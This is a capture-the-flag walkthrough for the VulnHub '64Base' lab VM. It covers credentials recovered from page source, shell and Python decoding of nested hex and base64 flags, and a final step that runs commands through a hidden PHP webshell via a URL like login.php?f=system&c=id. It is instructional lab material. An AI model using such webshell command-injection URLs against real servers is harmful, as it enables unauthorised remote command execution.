Download
Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQ sections dealing with the dangers of running unknown VMs and our suggestions for "protecting yourself and your network". If you understand the risks, please download!
- 64Base_3mrgnc3.ova (Size: 1.5 GB)
- Download: https://www.dropbox.com/s/30zw231gg523ah8/64Base_3mrgnc3-v1.0.1.ova?dl=0
- Download (Mirror): https://download.vulnhub.com/64base/64Base_3mrgnc3.ova
- Download (Torrent): https://download.vulnhub.com/64base/64Base_3mrgnc3.ova.torrent ( Magnet)
Information gathering
Browse to the web server on port 80.
View the page source.
64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
A username and password are required for:
http://192.168.243.162/Imperial-Class/BountyHunter/
The source has already shown them.
Log in with (64base:Th353@r3N0TdaDr01DzU@reL00K1ing4); the login succeeds.
root@kali:~# echo "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a" | xxd -p -r | base64 --decode
flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}
root@kali:~# echo 'aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=' | base64 -d
https://www.youtube.com/watch?v=vJwytFWA8uA
Following the result, open the video link; the video's title hints at using Burp.
flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=}
root@kali:~# echo 'NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=' | base64 -d
53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id
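The flags on this box are nested encodings: flag2 arrives as hex wrapping base64 wrapping a flag{...} whose body is base64 again, and flag3 is a flag{...} whose body is base64. The following Python routine is an added example, not code from the original write-up: it peels those layers automatically, recording each flagN{...} body before decoding it further. The hex blob and the base64 strings are copied from this page; the layer detection (try hex first, then strict base64, stop when neither applies) is my own heuristic. The flag4 string further down decodes the same way.

```python
import base64
import binascii
import re

# Hex blob exactly as shown on the page (the flag2 layer).
FLAG2_HEX = (
    "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a64575658"
    "4f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c325271"
    "4d544a54626d51315a455661574646556144465255573839"
    "66516f3d0a"
)
# flag3 as it appeared, and the flag4 base64 body from the page.
FLAG3_WRAPPED = ("flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVy"
                 "L2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=}")
FLAG4_B64 = "NjRiYXNlOjY0YmFzZTVoMzc3Cg=="

FLAG_RE = re.compile(r"flag(\d+)\{([^}]*)\}")


def is_hex(s: str) -> bool:
    """True for a non-empty, even-length string made only of hex digits."""
    return len(s) > 0 and len(s) % 2 == 0 and all(
        c in "0123456789abcdefABCDEF" for c in s)


def decode_layer(text: str):
    """Strip one encoding layer: hex first, then strict base64.

    Returns the decoded text, or None when the input is neither
    (which is how we recognise that we have reached plaintext)."""
    s = text.strip()
    if is_hex(s):
        try:
            return binascii.unhexlify(s).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            pass
    try:
        # validate=True rejects characters outside the base64 alphabet,
        # so URLs, paths and "user:pass" strings fail here instead of
        # being silently mangled by the default lenient decoder.
        return base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def peel(blob: str, max_layers: int = 16):
    """Peel encoding layers until plaintext is reached.

    Whenever a flagN{...} wrapper shows up, its body is recorded and
    decoding continues on the body, because in this box the flag body
    is itself another encoded string. Returns (flags, final_plaintext)."""
    flags = {}
    cur = blob
    for _ in range(max_layers):
        m = FLAG_RE.search(cur)
        if m:
            flags[int(m.group(1))] = m.group(2)
            cur = m.group(2)
        nxt = decode_layer(cur)
        if nxt is None or not nxt.strip():
            break
        cur = nxt
    return flags, cur.strip()


if __name__ == "__main__":
    for label, blob in (("flag2", FLAG2_HEX), ("flag3", FLAG3_WRAPPED),
                        ("flag4", FLAG4_B64)):
        flags, plaintext = peel(blob)
        print(label, flags, "->", plaintext)
```

Running it reproduces the manual `xxd -p -r | base64 --decode` chain: flag2 resolves to the YouTube URL and flag3 to the login.php path, and flag4 (which has no flag{...} wrapper) to the credential string.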
Getting a webshell
Browsing to http://IP//Imperial-Class/BountyHunter/login.php?f=exec&c=id returns no output.
Then a hint appears:
IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377
Build the URL with system instead. PHP's exec() only hands the last line of output back to the caller and prints nothing unless that return value is echoed, whereas system() writes the command's output straight into the response, which is why the exec variant looked like it did nothing:
http://IP//Imperial-Class/BountyHunter/login.php?f=system&c=id
flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}
Decoded: 64base:64base5h377
Could not execute.